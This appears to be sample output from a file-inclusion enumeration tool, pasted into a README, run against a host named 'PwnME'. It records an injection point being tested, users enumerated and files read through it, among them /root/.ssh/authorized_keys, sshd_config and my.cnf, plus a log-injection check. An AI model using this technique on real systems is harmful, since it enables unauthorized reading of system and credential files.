an actual results file here. git markup does not like all those hashtags :) 
############################################################
Testing injection point
Identified result using absolute_path method
############################################################
Enumerating users
* root
* dev
* vmail
* policyd
############################################################
Detecting not found pattern
Using pattern: "not found" as not found
############################################################
Enumerating user files
* /root/.ssh/authorized_keys [OK]
* /home/dev/.profile [OK]
* /home/dev/.bashrc [OK]
* /home/vmail/.profile [OK]
* /home/vmail/.bashrc [OK]
############################################################
Enumerating system files
* /etc/ssh/sshd_config [OK]
* /etc/mysql/my.cnf [OK]
* /etc/apache2/apache2.conf [OK]
* /var/lib/dhcp/dhclient.eth0.leases [OK]
* /etc/nginx/nginx.conf [OK]
############################################################
Checking for log injection
############################################################
Dumping system info
* hostname: PwnME (/etc/hostname)
* os_version: Debian GNU/Linux 9 \n \l (/etc/issue)
* kernel: Linux version 3.16.0-5-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.51-3+deb8u1 (2018-01-08) (/proc/version)
Done :)
